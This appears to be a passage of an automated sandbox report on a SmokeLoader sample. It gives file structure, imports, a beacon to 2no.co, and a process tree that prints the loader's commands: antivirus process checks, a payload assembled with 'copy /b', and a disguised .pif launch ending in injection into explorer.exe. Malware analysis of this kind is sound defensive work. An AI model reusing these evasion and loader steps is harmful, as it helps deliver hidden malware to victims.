                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x10000x65560x6600dd25e171f2e0fe45f2800cc9e162537dFalse0.6652113970588235data6.456753840355455IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data0xa0000x1fb380x6002bc02714ee74ba781d92e94eeaccb080False0.501953125data4.040639308682379IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .ndata0x2a0000x100000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc0x3a0000x18900x1a0090098fb966fdc51dab41eb591afbc3afFalse0.5543870192307693data5.154852653297943IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0x3a1900x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.6213570127504554
                                                  RT_DIALOG0x3b2b80x100dataEnglishUnited States0.5234375
                                                  RT_DIALOG0x3b3b80x11cdataEnglishUnited States0.6056338028169014
                                                  RT_DIALOG0x3b4d80x60dataEnglishUnited States0.7291666666666666
                                                  RT_GROUP_ICON0x3b5380x14dataEnglishUnited States1.05
                                                  RT_MANIFEST0x3b5500x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                  DLLImport
                                                  ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                  SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                  ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                  COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                  USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                  GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                  KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishUnited States
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jul 23, 2024 09:20:44.857872963 CEST49703443192.168.2.7104.21.79.229
                                                  Jul 23, 2024 09:20:44.857902050 CEST44349703104.21.79.229192.168.2.7
                                                  Jul 23, 2024 09:20:44.858236074 CEST49703443192.168.2.7104.21.79.229
                                                  Jul 23, 2024 09:20:44.871510983 CEST49703443192.168.2.7104.21.79.229
                                                  Jul 23, 2024 09:20:44.871537924 CEST44349703104.21.79.229192.168.2.7
                                                  Jul 23, 2024 09:20:45.677864075 CEST44349703104.21.79.229192.168.2.7
                                                  Jul 23, 2024 09:20:45.677972078 CEST49703443192.168.2.7104.21.79.229
                                                  Jul 23, 2024 09:20:45.744682074 CEST49703443192.168.2.7104.21.79.229
                                                  Jul 23, 2024 09:20:45.744709969 CEST44349703104.21.79.229192.168.2.7
                                                  Jul 23, 2024 09:20:45.745048046 CEST44349703104.21.79.229192.168.2.7
                                                  Jul 23, 2024 09:20:45.745112896 CEST49703443192.168.2.7104.21.79.229
                                                  Jul 23, 2024 09:20:45.748821974 CEST49703443192.168.2.7104.21.79.229
                                                  Jul 23, 2024 09:20:45.796500921 CEST44349703104.21.79.229192.168.2.7
                                                  Jul 23, 2024 09:20:46.311831951 CEST44349703104.21.79.229192.168.2.7
                                                  Jul 23, 2024 09:20:46.311909914 CEST49703443192.168.2.7104.21.79.229
                                                  Jul 23, 2024 09:20:46.311918020 CEST44349703104.21.79.229192.168.2.7
                                                  Jul 23, 2024 09:20:46.311960936 CEST49703443192.168.2.7104.21.79.229
                                                  Jul 23, 2024 09:20:46.318672895 CEST49703443192.168.2.7104.21.79.229
                                                  Jul 23, 2024 09:20:46.318700075 CEST44349703104.21.79.229192.168.2.7
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jul 23, 2024 09:20:44.840737104 CEST6418853192.168.2.71.1.1.1
                                                  Jul 23, 2024 09:20:44.852020025 CEST53641881.1.1.1192.168.2.7
                                                  Jul 23, 2024 09:20:46.321042061 CEST5652153192.168.2.71.1.1.1
                                                  Jul 23, 2024 09:20:46.331325054 CEST53565211.1.1.1192.168.2.7
                                                  Jul 23, 2024 09:21:12.530373096 CEST5350524162.159.36.2192.168.2.7
                                                  Jul 23, 2024 09:21:13.044060946 CEST5375553192.168.2.71.1.1.1
                                                  Jul 23, 2024 09:21:13.051623106 CEST53537551.1.1.1192.168.2.7
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jul 23, 2024 09:20:44.840737104 CEST192.168.2.71.1.1.10x3637Standard query (0)2no.coA (IP address)IN (0x0001)false
                                                  Jul 23, 2024 09:20:46.321042061 CEST192.168.2.71.1.1.10x2b56Standard query (0)UaTVQmthThJ.UaTVQmthThJA (IP address)IN (0x0001)false
                                                  Jul 23, 2024 09:21:13.044060946 CEST192.168.2.71.1.1.10xd29Standard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jul 23, 2024 09:20:44.852020025 CEST1.1.1.1192.168.2.70x3637No error (0)2no.co104.21.79.229A (IP address)IN (0x0001)false
                                                  Jul 23, 2024 09:20:44.852020025 CEST1.1.1.1192.168.2.70x3637No error (0)2no.co172.67.149.76A (IP address)IN (0x0001)false
                                                  Jul 23, 2024 09:20:46.331325054 CEST1.1.1.1192.168.2.70x2b56Name error (3)UaTVQmthThJ.UaTVQmthThJnonenoneA (IP address)IN (0x0001)false
                                                  Jul 23, 2024 09:21:13.051623106 CEST1.1.1.1192.168.2.70xd29Name error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                  • 2no.co
                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.749703104.21.79.2294437244C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif
                                                  TimestampBytes transferredDirectionData
                                                  2024-07-23 07:20:45 UTC54OUTGET /16G965 HTTP/1.1
                                                  User-Agent: Sk
                                                  Host: 2no.co
                                                  2024-07-23 07:20:46 UTC1128INHTTP/1.1 200 OK
                                                  Date: Tue, 23 Jul 2024 07:20:46 GMT
                                                  Content-Type: image/png
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  set-cookie: 53800304137263905=3; expires=Wed, 23 Jul 2025 07:20:46 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                  set-cookie: clhf03028ja=8.46.123.33; expires=Wed, 23 Jul 2025 07:20:46 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                                                  memory: 0.4298248291015625
                                                  expires: Tue, 23 Jul 2024 07:20:46 +0000
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  strict-transport-security: max-age=604800
                                                  strict-transport-security: max-age=31536000
                                                  content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                  x-frame-options: SAMEORIGIN
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TSjAuPguanTJZxPKbNM1UnhZWE4yxgduaqhw86edMlgLMEVCzBiVG5JcN4GYW3LIuFueai5HJHGwWEB1zaMHWai2EaTKMIj%2F5OxwLDyMUDdlp%2BcmWYCuB4Y%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8a79e8e6dda47d14-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-07-23 07:20:46 UTC122INData Raw: 37 34 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 01 00 00 00 01 01 03 00 00 00 25 db 56 ca 00 00 00 03 50 4c 54 45 00 00 00 a7 7a 3d da 00 00 00 01 74 52 4e 53 00 40 e6 d8 66 00 00 00 09 70 48 59 73 00 00 0e c4 00 00 0e c4 01 95 2b 0e 1b 00 00 00 0a 49 44 41 54 08 99 63 60 00 00 00 02 00 01 f4 71 64 a6 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                  Data Ascii: 74PNGIHDR%VPLTEz=tRNS@fpHYs+IDATc`qdIENDB`
                                                  2024-07-23 07:20:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:03:20:38
                                                  Start date:23/07/2024
                                                  Path:C:\Users\user\Desktop\lSmb6nDsrC.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\lSmb6nDsrC.exe"
                                                  Imagebase:0x400000
                                                  File size:709'936 bytes
                                                  MD5 hash:83741BBCA9631AA4925203FBDDC0AD7D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:03:20:39
                                                  Start date:23/07/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\System32\cmd.exe" /k move Origins Origins.cmd & Origins.cmd & exit
                                                  Imagebase:0x410000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:03:20:39
                                                  Start date:23/07/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff75da10000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:03:20:41
                                                  Start date:23/07/2024
                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:tasklist
                                                  Imagebase:0x800000
                                                  File size:79'360 bytes
                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:03:20:41
                                                  Start date:23/07/2024
                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:findstr /I "wrsa.exe opssvc.exe"
                                                  Imagebase:0x6d0000
                                                  File size:29'696 bytes
                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:8
                                                  Start time:03:20:41
                                                  Start date:23/07/2024
                                                  Path:C:\Windows\SysWOW64\tasklist.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:tasklist
                                                  Imagebase:0x800000
                                                  File size:79'360 bytes
                                                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:9
                                                  Start time:03:20:41
                                                  Start date:23/07/2024
                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                                                  Imagebase:0x6d0000
                                                  File size:29'696 bytes
                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:14
                                                  Start time:03:20:42
                                                  Start date:23/07/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd /c md 55116385
                                                  Imagebase:0x410000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:15
                                                  Start time:03:20:42
                                                  Start date:23/07/2024
                                                  Path:C:\Windows\SysWOW64\findstr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:findstr /V "SlutSteLouisTranslation" Cyprus
                                                  Imagebase:0x6d0000
                                                  File size:29'696 bytes
                                                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:17
                                                  Start time:03:20:42
                                                  Start date:23/07/2024
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:cmd /c copy /b Breeding + Fuji + Weather 55116385\s
                                                  Imagebase:0x410000
                                                  File size:236'544 bytes
                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:19
                                                  Start time:03:20:42
                                                  Start date:23/07/2024
                                                  Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif
                                                  Wow64 process (32bit):true
                                                  Commandline:55116385\Labs.pif 55116385\s
                                                  Imagebase:0x770000
                                                  File size:893'608 bytes
                                                  MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 7%, ReversingLabs
                                                  • Detection: 3%, Virustotal, Browse
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:20
                                                  Start time:03:20:43
                                                  Start date:23/07/2024
                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                  Wow64 process (32bit):true
                                                  Commandline:ping -n 5 127.0.0.1
                                                  Imagebase:0xb70000
                                                  File size:18'944 bytes
                                                  MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:moderate
                                                  Has exited:true

                                                  Target ID:27
                                                  Start time:04:30:58
                                                  Start date:23/07/2024
                                                  Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\55116385\Labs.pif
                                                  Imagebase:0x770000
                                                  File size:893'608 bytes
                                                  MD5 hash:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001B.00000002.2328144383.0000000003021000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001B.00000002.2328144383.0000000003021000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001B.00000002.2327756432.0000000001280000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001B.00000002.2327756432.0000000001280000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                  Has exited:true

                                                  Target ID:28
                                                  Start time:04:31:09
                                                  Start date:23/07/2024
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0x7ff70ffd0000
                                                  File size:5'141'208 bytes
                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000001C.00000002.2477965880.0000000000F41000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000001C.00000002.2477965880.0000000000F41000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                                                  Has exited:false

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:18.8%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:17%
                                                    Total number of Nodes:1374
                                                    Total number of Limit Nodes:21
                                                    execution_graph 3979 402643 3980 402672 3979->3980 3981 402657 3979->3981 3982 4026a2 3980->3982 3983 402677 3980->3983 3984 402d89 21 API calls 3981->3984 3986 402dab 21 API calls 3982->3986 3985 402dab 21 API calls 3983->3985 3991 40265e 3984->3991 3987 40267e 3985->3987 3988 4026a9 lstrlenW 3986->3988 3996 406543 WideCharToMultiByte 3987->3996 3988->3991 3990 402692 lstrlenA 3990->3991 3992 4026d6 3991->3992 3994 4026ec 3991->3994 3997 4060f2 SetFilePointer 3991->3997 3993 4060c3 WriteFile 3992->3993 3992->3994 3993->3994 3996->3990 3998 40610e 3997->3998 3999 406126 3997->3999 4000 406094 ReadFile 3998->4000 3999->3992 4001 40611a 4000->4001 4001->3999 4002 406157 SetFilePointer 4001->4002 4003 40612f SetFilePointer 4001->4003 4002->3999 4003->4002 4004 40613a 4003->4004 4005 4060c3 WriteFile 4004->4005 4005->3999 3580 4015c6 3581 402dab 21 API calls 3580->3581 3582 4015cd 3581->3582 3600 405e9b CharNextW CharNextW 3582->3600 3584 401636 3586 401668 3584->3586 3587 40163b 3584->3587 3585 405e1d CharNextW 3591 4015d6 3585->3591 3590 401423 28 API calls 3586->3590 3606 401423 3587->3606 3597 401660 3590->3597 3591->3584 3591->3585 3596 4015ff 3591->3596 3598 40161c GetFileAttributesW 3591->3598 3610 405aec 3591->3610 3616 405acf CreateDirectoryW 3591->3616 3595 40164f SetCurrentDirectoryW 3595->3597 3596->3591 3613 405a75 CreateDirectoryW 3596->3613 3598->3591 3601 405eb8 3600->3601 3602 405eca 3600->3602 3601->3602 3603 405ec5 CharNextW 3601->3603 3604 405e1d CharNextW 3602->3604 3605 405eee 3602->3605 3603->3605 3604->3602 3605->3591 3607 4055a6 28 API calls 3606->3607 3608 401431 3607->3608 3609 406521 lstrcpynW 3608->3609 3609->3595 3611 406915 5 API calls 3610->3611 3612 405af3 3611->3612 3612->3591 3614 405ac1 3613->3614 3615 405ac5 GetLastError 3613->3615 3614->3596 3615->3614 3617 405ae3 GetLastError 3616->3617 3618 405adf 3616->3618 3617->3618 3618->3591 4012 401c48 4013 402d89 21 API calls 4012->4013 4014 401c4f 4013->4014 4015 402d89 21 API calls 4014->4015 4016 401c5c 4015->4016 4017 402dab 21 API calls 4016->4017 4020 401c71 4016->4020 4017->4020 4018 401cd8 4023 402dab 21 API calls 4018->4023 4019 401c8c 4022 402d89 21 API calls 4019->4022 4021 402dab 21 API calls 4020->4021 4024 401c81 4020->4024 4021->4024 4025 401c91 4022->4025 4026 401cdd 4023->4026 4024->4018 4024->4019 4027 402d89 21 API calls 4025->4027 4028 402dab 21 API calls 4026->4028 4029 401c9d 4027->4029 4030 401ce6 FindWindowExW 4028->4030 4031 401cc8 SendMessageW 4029->4031 4032 401caa SendMessageTimeoutW 4029->4032 4033 401d08 4030->4033 4031->4033 4032->4033 4041 4028c9 4042 4028cf 4041->4042 4043 4028d7 FindClose 4042->4043 4044 402c2f 4042->4044 4043->4044 4045 40494a 4046 404980 4045->4046 4047 40495a 4045->4047 4049 404507 8 API calls 4046->4049 4048 4044a0 22 API calls 4047->4048 4050 404967 SetDlgItemTextW 4048->4050 4051 40498c 4049->4051 4050->4046 4055 4016d1 4056 402dab 21 API calls 4055->4056 4057 4016d7 GetFullPathNameW 4056->4057 4058 4016f1 4057->4058 4064 401713 4057->4064 4061 40687e 2 API calls 4058->4061 4058->4064 4059 401728 GetShortPathNameW 4060 402c2f 4059->4060 4062 401703 4061->4062 4062->4064 4065 406521 lstrcpynW 4062->4065 4064->4059 4064->4060 4065->4064 4066 401e53 GetDC 4067 402d89 21 API calls 4066->4067 4068 401e65 GetDeviceCaps MulDiv ReleaseDC 4067->4068 4069 402d89 21 API calls 4068->4069 4070 401e96 4069->4070 4071 40655e 21 API calls 4070->4071 4072 401ed3 CreateFontIndirectW 4071->4072 4073 40263d 4072->4073 4074 402955 4075 402dab 21 API calls 4074->4075 4076 402961 4075->4076 4077 402977 4076->4077 4078 402dab 21 API calls 4076->4078 4079 405fec 2 API calls 4077->4079 4078->4077 4080 40297d 4079->4080 4102 406011 GetFileAttributesW CreateFileW 4080->4102 4082 40298a 4083 402a40 4082->4083 4084 4029a5 GlobalAlloc 4082->4084 4085 402a28 4082->4085 4086 402a47 DeleteFileW 4083->4086 4087 402a5a 4083->4087 4084->4085 4088 4029be 4084->4088 4089 4032b9 39 API calls 4085->4089 4086->4087 4103 4034b4 SetFilePointer 4088->4103 4091 402a35 CloseHandle 4089->4091 4091->4083 4092 4029c4 4093 40349e ReadFile 4092->4093 4094 4029cd GlobalAlloc 4093->4094 4095 402a11 4094->4095 4096 4029dd 4094->4096 4097 4060c3 WriteFile 4095->4097 4098 4032b9 39 API calls 4096->4098 4099 402a1d GlobalFree 4097->4099 4101 4029ea 4098->4101 4099->4085 4100 402a08 GlobalFree 4100->4095 4101->4100 4102->4082 4103->4092 4104 4045d6 lstrcpynW lstrlenW 4105 4014d7 4106 402d89 21 API calls 4105->4106 4107 4014dd Sleep 4106->4107 4109 402c2f 4107->4109 4110 40195b 4111 402dab 21 API calls 4110->4111 4112 401962 lstrlenW 4111->4112 4113 40263d 4112->4113 4114 4020dd 4115 4020ef 4114->4115 4125 4021a1 4114->4125 4116 402dab 21 API calls 4115->4116 4117 4020f6 4116->4117 4119 402dab 21 API calls 4117->4119 4118 401423 28 API calls 4120 4022fb 4118->4120 4121 4020ff 4119->4121 4122 402115 LoadLibraryExW 4121->4122 4123 402107 GetModuleHandleW 4121->4123 4124 402126 4122->4124 4122->4125 4123->4122 4123->4124 4134 406984 4124->4134 4125->4118 4128 402170 4130 4055a6 28 API calls 4128->4130 4129 402137 4131 401423 28 API calls 4129->4131 4132 402147 4129->4132 4130->4132 4131->4132 4132->4120 4133 402193 FreeLibrary 4132->4133 4133->4120 4139 406543 WideCharToMultiByte 4134->4139 4136 4069a1 4137 4069a8 GetProcAddress 4136->4137 4138 402131 4136->4138 4137->4138 4138->4128 4138->4129 4139->4136 4140 402b5e 4141 402bb0 4140->4141 4142 402b65 4140->4142 4143 406915 5 API calls 4141->4143 4144 402bae 4142->4144 4146 402d89 21 API calls 4142->4146 4145 402bb7 4143->4145 4147 402dab 21 API calls 4145->4147 4148 402b73 4146->4148 4149 402bc0 4147->4149 4150 402d89 21 API calls 4148->4150 4149->4144 4151 402bc4 IIDFromString 4149->4151 4153 402b7f 4150->4153 4151->4144 4152 402bd3 4151->4152 4152->4144 4158 406521 lstrcpynW 4152->4158 4157 406468 wsprintfW 4153->4157 4155 402bf0 CoTaskMemFree 4155->4144 4157->4144 4158->4155 4166 40465f 4167 404791 4166->4167 4169 404677 4166->4169 4168 4047fb 4167->4168 4170 4048c5 4167->4170 4175 4047cc GetDlgItem SendMessageW 4167->4175 4168->4170 4171 404805 GetDlgItem 4168->4171 4172 4044a0 22 API calls 4169->4172 4177 404507 8 API calls 4170->4177 4173 404886 4171->4173 4174 40481f 4171->4174 4176 4046de 4172->4176 4173->4170 4179 404898 4173->4179 4174->4173 4178 404845 SendMessageW LoadCursorW SetCursor 4174->4178 4199 4044c2 KiUserCallbackDispatcher 4175->4199 4181 4044a0 22 API calls 4176->4181 4188 4048c0 4177->4188 4203 40490e 4178->4203 4183 4048ae 4179->4183 4184 40489e SendMessageW 4179->4184 4186 4046eb CheckDlgButton 4181->4186 4183->4188 4189 4048b4 SendMessageW 4183->4189 4184->4183 4185 4047f6 4200 4048ea 4185->4200 4197 4044c2 KiUserCallbackDispatcher 4186->4197 4189->4188 4192 404709 GetDlgItem 4198 4044d5 SendMessageW 4192->4198 4194 40471f SendMessageW 4195 404745 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4194->4195 4196 40473c GetSysColor 4194->4196 4195->4188 4196->4195 4197->4192 4198->4194 4199->4185 4201 4048f8 4200->4201 4202 4048fd SendMessageW 4200->4202 4201->4202 4202->4168 4206 405b47 ShellExecuteExW 4203->4206 4205 404874 LoadCursorW SetCursor 4205->4173 4206->4205 4207 402a60 4208 402d89 21 API calls 4207->4208 4209 402a66 4208->4209 4210 402aa9 4209->4210 4211 402a8d 4209->4211 4217 402933 4209->4217 4214 402ac3 4210->4214 4215 402ab3 4210->4215 4212 402a92 4211->4212 4213 402aa3 4211->4213 4221 406521 lstrcpynW 4212->4221 4213->4217 4222 406468 wsprintfW 4213->4222 4216 40655e 21 API calls 4214->4216 4218 402d89 21 API calls 4215->4218 4216->4213 4218->4213 4221->4217 4222->4217 3292 401761 3298 402dab 3292->3298 3296 40176f 3297 406040 2 API calls 3296->3297 3297->3296 3299 402db7 3298->3299 3300 40655e 21 API calls 3299->3300 3301 402dd8 3300->3301 3302 401768 3301->3302 3303 4067cf 5 API calls 3301->3303 3304 406040 3302->3304 3303->3302 3305 40604d GetTickCount GetTempFileNameW 3304->3305 3306 406087 3305->3306 3307 406083 3305->3307 3306->3296 3307->3305 3307->3306 4223 401d62 4224 402d89 21 API calls 4223->4224 4225 401d73 SetWindowLongW 4224->4225 4226 402c2f 4225->4226 3417 401ee3 3425 402d89 3417->3425 3419 401ee9 3420 402d89 21 API calls 3419->3420 3421 401ef5 3420->3421 3422 401f01 ShowWindow 3421->3422 3423 401f0c EnableWindow 3421->3423 3424 402c2f 3422->3424 3423->3424 3426 40655e 21 API calls 3425->3426 3427 402d9e 3426->3427 3427->3419 4227 4028e3 4228 4028eb 4227->4228 4229 4028ef FindNextFileW 4228->4229 4230 402901 4228->4230 4229->4230 4231 402948 4229->4231 4233 406521 lstrcpynW 4231->4233 4233->4230 3525 4056e5 3526 405706 GetDlgItem GetDlgItem GetDlgItem 3525->3526 3527 